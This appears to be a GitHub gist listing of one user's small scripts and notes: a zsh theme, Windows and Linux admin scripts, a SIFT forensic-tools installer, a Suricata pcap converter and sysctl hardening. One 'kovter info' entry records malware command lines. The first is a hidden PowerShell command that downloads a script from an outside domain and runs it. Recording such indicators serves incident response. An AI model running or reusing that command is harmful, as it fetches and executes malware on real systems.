@jermdw
jermdw / jerm.zsh-theme
Created April 10, 2018 04:23
Custom ZSH Prompt / Theme
PROMPT='%{$fg_bold[white]%}%M %{$fg_bold[red]%}✈ %{$fg_bold[green]%}%p %{$fg[cyan]%}%c %{$fg_bold[blue]%}$(git_prompt_info)%{$fg_bold[blue]%} % %{$reset_color%}'
@jermdw
jermdw / wmi_explorer.ps1
Created February 16, 2018 17:00
Powershell WMI Explorer Program
#
# WmiExplorer.ps1
#
# A GUI WMI explorer and WMI Method Help generator
#
# /\/\o\/\/ 2006
# www.ThePowerShellGuy.com
#
# load Forms NameSpace
[void][System.Reflection.Assembly]::LoadWithPartialName("System.windows.forms")
@jermdw
jermdw / autorunsc.md
Created January 31, 2018 16:28
Autorunsc

./autorunsc -a * -c -h -m -s -t -nobanner * >> autorunsc.txt

@jermdw
jermdw / install_sift.sh
Created January 25, 2018 03:41
Install SIFT Workstation Tools
#!/usr/bin/env bash
# Install SIFT Workstation Tools - tested to work on Ubuntu 16.04
# j3rmbadger
# Snag the binaries - https://github.com/sans-dfir/sift-cli
wget https://github.com/sans-dfir/sift-cli/releases/download/v1.5.1/sift-cli-linux
wget https://github.com/sans-dfir/sift-cli/releases/download/v1.5.1/sift-cli-linux.sha256.asc
# Validate signature file
gpg --keyserver pgp.mit.edu --recv-keys 22598A94
@jermdw
jermdw / imgcat.sh
Created January 24, 2018 15:44
Imgcat - view images in iTerm2
#!/bin/bash
# tmux requires unrecognized OSC sequences to be wrapped with DCS tmux;
# <sequence> ST, and for all ESCs in <sequence> to be replaced with ESC ESC. It
# only accepts ESC backslash for ST.
#
# Don't forget to chmod +x to imgcat.sh (makes script executable)
function print_osc() {
    if [[ $TERM == screen* ]] ; then
@jermdw
jermdw / control_ksm.sh
Created January 19, 2018 21:38
Linux KSM Init Script
#!/bin/sh
#
# Author: Marin Atanasov Nikolov <dnaeon@gmail.com>
# http://dnaeon.github.io/enable-ksm-during-boot-time-on-linux/
#
### BEGIN INIT INFO
# Provides: ksm
# Required-Start:
# Required-Stop:
# X-Start-Before:
@jermdw
jermdw / log_tail.md
Created January 15, 2018 01:34
Tail Logs

Tail logs using Journald

sudo journalctl -f -u ssh.service

@jermdw
jermdw / b64_2_pcap.py
Created January 9, 2018 18:30
Convert Base64 encoded packet capture from Suricata IDS into a binary PCAP file for analysis.
#!/usr/bin/env python2
import base64, struct, sys
if len(sys.argv) > 1:
    try:
        binary = base64.decodestring(sys.argv[1])
        # File header (pcap global header)
        sys.stdout.write(struct.pack("IHHIIII",
            0xa1b2c3d4,  # Magic
@jermdw
jermdw / kovter.gist
Created January 8, 2018 17:33
kovter info
1.
`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1515369180924.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://choh5franchising.org/255284510275/1515369170878859/FlashPlayer.jse',$d);Invoke-Item $d;`
2.
`Parent Command Line "C:\Windows\System32\WScript.exe" "C:\Users\SVCSTO~1\AppData\Local\Temp\1515369180924.js"`
`Process Command Line:
"C:\Windows\System32\cmd.exe" /v /k "@echo off & color 0A &SET PRG0=[____________________] 0&SET PRG1=[##__________________] 10&SET PRG2=[####________________] 20&SET PRG3=[######______________] 30&SET PRG4=[########____________] 40&SET PRG5=[##########__________] 50&SET PRG6=[############________] 60&SET PRG7=[##############______] 70&SET PRG8=[################____] 80&SET PRG9=[##################__] 90&SET PRG10=[####################] 100&echo Please Wait...&ping -n 2 localhost >nul&(FOR /L %I IN (0,1,10) DO (cls&echo Please Wait...&echo --------------------------------------&echo Progress: !PR
@jermdw
jermdw / sysctl.conf
Created December 21, 2017 00:59
Hardened /etc/sysctl.conf
# Enable syn flood protection
net.ipv4.tcp_syncookies = 1
# Ignore source-routed packets
net.ipv4.conf.all.accept_source_route = 0
# Ignore source-routed packets
net.ipv4.conf.default.accept_source_route = 0
# Ignore ICMP redirects